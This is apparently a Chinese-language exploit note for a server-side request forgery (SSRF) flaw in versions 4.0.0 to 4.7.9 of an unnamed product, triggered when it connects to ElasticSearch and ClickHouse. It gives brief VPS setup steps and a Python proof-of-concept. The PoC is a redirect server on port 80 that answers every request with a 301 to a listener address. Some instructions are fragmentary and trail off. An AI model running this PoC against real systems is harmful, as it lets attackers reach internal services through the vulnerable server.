在其4.0.0到4.7.9版本之间,连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞(SSRF)。
VPS开启HTTP服务
VPS 开启HTTP 再同时跑POC
确保能访问poc里的链接文件
第一是目标地址
第二个是跳转地址
第三个是监听地址
如果想切换监听端口
poc:
import SimpleHTTPServer
import SocketServer
def redirect_handler_factory(url):
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
return RedirectHandler
def main():
redirectHandler = redirect_handler_factory("http://192.168.62.143:8000/1.txt")
handler = SocketServer.TCPServer(("", 80), redirectHandler)
print("serving at port 80")
handler.serve_forever()
if __name__ == "__main__":
main()